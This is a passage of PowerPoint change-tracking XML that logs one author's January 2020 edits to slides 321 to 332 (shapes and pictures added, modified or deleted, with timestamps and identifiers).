        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:53:27.852" v="11401" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4079346635" sldId="321"/>
            <ac:spMk id="9" creationId="{D4ED2E0F-C04F-1349-B973-1CF1A44EA286}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:53:35.756" v="11404"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4079346635" sldId="321"/>
            <ac:spMk id="10" creationId="{7EF0AAE0-8C8A-BC4F-AA17-CB2D45BEB9BB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:53:43.774" v="11406"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4079346635" sldId="321"/>
            <ac:spMk id="11" creationId="{2DEBEA11-469F-3343-98D8-973A7247DF28}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:05:57.958" v="11830" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4079346635" sldId="321"/>
            <ac:spMk id="14" creationId="{2CDEEE0D-0C43-6745-85E5-F6BE7154AC0E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:03:01.397" v="11412" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4079346635" sldId="321"/>
            <ac:spMk id="19" creationId="{3741B58E-3B65-4A01-A276-975AB2CF8A08}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:03:01.397" v="11412" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4079346635" sldId="321"/>
            <ac:spMk id="21" creationId="{7AAC67C3-831B-4AB1-A259-DFB839CAFAFC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:03:01.397" v="11412" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4079346635" sldId="321"/>
            <ac:spMk id="26" creationId="{D40791F6-715D-481A-9C4A-3645AECFD5A0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:03:01.397" v="11412" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4079346635" sldId="321"/>
            <ac:spMk id="30" creationId="{811CBAFA-D7E0-40A7-BB94-2C05304B407B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:03:56.509" v="11415" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4079346635" sldId="321"/>
            <ac:picMk id="3" creationId="{C70EF3C9-3881-154D-ABC5-13D8AA9246D2}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:03:01.397" v="11412" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4079346635" sldId="321"/>
            <ac:picMk id="4" creationId="{2A94EBE0-7C57-6B40-9898-DFBD095A276D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:03:01.397" v="11412" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4079346635" sldId="321"/>
            <ac:cxnSpMk id="28" creationId="{740F83A4-FAC4-4867-95A5-BBFD280C7BF5}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:51:24.237" v="11390" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3324083004" sldId="322"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:51:24.237" v="11390" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3324083004" sldId="322"/>
            <ac:picMk id="3" creationId="{1DC3D0D0-5C08-E74C-9BB6-78EE18F619A9}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:06:51.688" v="12087" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2084375309" sldId="323"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:06:51.688" v="12087" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2084375309" sldId="323"/>
            <ac:spMk id="14" creationId="{2CDEEE0D-0C43-6745-85E5-F6BE7154AC0E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add del">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:13:21.659" v="12261" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1731297768" sldId="324"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:11:07.381" v="12184" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1731297768" sldId="324"/>
            <ac:spMk id="14" creationId="{2CDEEE0D-0C43-6745-85E5-F6BE7154AC0E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:10:21.252" v="12133" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1731297768" sldId="324"/>
            <ac:picMk id="3" creationId="{685B07E5-7E86-E746-A922-34570518051E}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:07:10.349" v="12090" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1731297768" sldId="324"/>
            <ac:picMk id="4" creationId="{2A94EBE0-7C57-6B40-9898-DFBD095A276D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:10:38.680" v="12168" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1731297768" sldId="324"/>
            <ac:picMk id="5" creationId="{2333DC4F-7127-7141-996D-6F4704A2DA5A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:13:24.654" v="12263" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2155149743" sldId="325"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:13:24.654" v="12263" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2155149743" sldId="325"/>
            <ac:spMk id="14" creationId="{2CDEEE0D-0C43-6745-85E5-F6BE7154AC0E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:29:58.701" v="13070" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2091226787" sldId="326"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:14:30.140" v="12357" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2091226787" sldId="326"/>
            <ac:spMk id="7" creationId="{7C4A5172-FF4F-344F-882D-4AB7AB8601DE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:14:33.792" v="12359" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2091226787" sldId="326"/>
            <ac:spMk id="8" creationId="{1155C8CF-E22A-084A-AECE-21C2F00A850B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:14:41.994" v="12364" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2091226787" sldId="326"/>
            <ac:spMk id="9" creationId="{53723B57-8E63-C24C-9B98-1D85ED874AFA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:29:58.701" v="13070" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2091226787" sldId="326"/>
            <ac:spMk id="14" creationId="{2CDEEE0D-0C43-6745-85E5-F6BE7154AC0E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:13:37.989" v="12269" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2091226787" sldId="326"/>
            <ac:picMk id="3" creationId="{94F83E50-01D2-3348-B7B4-EBFC882BE91A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:30:02.616" v="13071" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3301293235" sldId="327"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:30:02.616" v="13071" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3301293235" sldId="327"/>
            <ac:spMk id="14" creationId="{2CDEEE0D-0C43-6745-85E5-F6BE7154AC0E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:28:19.060" v="13069" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="637941441" sldId="328"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:19:38.899" v="12779" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="637941441" sldId="328"/>
            <ac:spMk id="2" creationId="{FA7CCCB0-0F31-8347-A5B7-5DC897336EC1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:17:45.856" v="12651" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="637941441" sldId="328"/>
            <ac:spMk id="7" creationId="{7C4A5172-FF4F-344F-882D-4AB7AB8601DE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:17:45.856" v="12651" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="637941441" sldId="328"/>
            <ac:spMk id="8" creationId="{1155C8CF-E22A-084A-AECE-21C2F00A850B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:17:45.856" v="12651" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="637941441" sldId="328"/>
            <ac:spMk id="9" creationId="{53723B57-8E63-C24C-9B98-1D85ED874AFA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:28:19.060" v="13069" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="637941441" sldId="328"/>
            <ac:spMk id="14" creationId="{2CDEEE0D-0C43-6745-85E5-F6BE7154AC0E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:19:38.899" v="12779" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="637941441" sldId="328"/>
            <ac:spMk id="19" creationId="{3741B58E-3B65-4A01-A276-975AB2CF8A08}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:19:38.899" v="12779" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="637941441" sldId="328"/>
            <ac:spMk id="21" creationId="{7AAC67C3-831B-4AB1-A259-DFB839CAFAFC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:19:38.899" v="12779" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="637941441" sldId="328"/>
            <ac:spMk id="23" creationId="{C8DD82D3-D002-45B0-B16A-82B3DA4EFDDB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:19:22.652" v="12776" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="637941441" sldId="328"/>
            <ac:spMk id="26" creationId="{3741B58E-3B65-4A01-A276-975AB2CF8A08}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:19:22.652" v="12776" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="637941441" sldId="328"/>
            <ac:spMk id="28" creationId="{7AAC67C3-831B-4AB1-A259-DFB839CAFAFC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:19:38.899" v="12779" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="637941441" sldId="328"/>
            <ac:spMk id="30" creationId="{A14E4FB9-9BBF-47B3-A09F-01A3868E961D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:17:44.832" v="12650" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="637941441" sldId="328"/>
            <ac:picMk id="3" creationId="{94F83E50-01D2-3348-B7B4-EBFC882BE91A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:19:38.899" v="12779" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="637941441" sldId="328"/>
            <ac:cxnSpMk id="24" creationId="{9F09C252-16FE-4557-AD6D-BB5CA773496C}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:32:56.973" v="13100" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1372378660" sldId="329"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:32:01.655" v="13088" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1372378660" sldId="329"/>
            <ac:spMk id="14" creationId="{2CDEEE0D-0C43-6745-85E5-F6BE7154AC0E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:32:56.973" v="13100" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1372378660" sldId="329"/>
            <ac:picMk id="3" creationId="{8B34E439-2D61-7040-9D4A-5E19B747AF6D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:32:55.501" v="13099" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1372378660" sldId="329"/>
            <ac:picMk id="4" creationId="{D36A879C-4C38-3945-96E4-1164CC0C9CAA}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:28:13.120" v="13068"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1897689167" sldId="330"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:42:52.114" v="13317" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="347174277" sldId="331"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:42:11.432" v="13314" actId="11"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="347174277" sldId="331"/>
            <ac:spMk id="14" creationId="{2CDEEE0D-0C43-6745-85E5-F6BE7154AC0E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:33:25.465" v="13104" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="347174277" sldId="331"/>
            <ac:picMk id="3" creationId="{8B34E439-2D61-7040-9D4A-5E19B747AF6D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:33:24.881" v="13103" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="347174277" sldId="331"/>
            <ac:picMk id="4" creationId="{D36A879C-4C38-3945-96E4-1164CC0C9CAA}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:42:38.325" v="13315" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="347174277" sldId="331"/>
            <ac:picMk id="5" creationId="{32732086-4308-1947-9151-8B423EBD57EF}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:42:52.114" v="13317" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="347174277" sldId="331"/>
            <ac:picMk id="6" creationId="{4A6EDBB8-1E4D-FA4C-8239-A4FE843CDA14}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:30:53.047" v="13073" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3695546756" sldId="331"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:45:12.683" v="13698" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3486430095" sldId="332"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:43:35.351" v="13370" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3486430095" sldId="332"/>
            <ac:spMk id="2" creationId="{FA7CCCB0-0F31-8347-A5B7-5DC897336EC1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:44:11.069" v="13501" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3486430095" sldId="332"/>
            <ac:spMk id="3" creationId="{BA887250-483A-334E-801F-C7C4D3C055AB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:45:12.683" v="13698" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3486430095" sldId="332"/>
            <ac:spMk id="9" creationId="{CD312071-BC93-8949-AAA2-85B0F34960AA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:43:30.377" v="13369" actId="15"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3486430095" sldId="332"/>
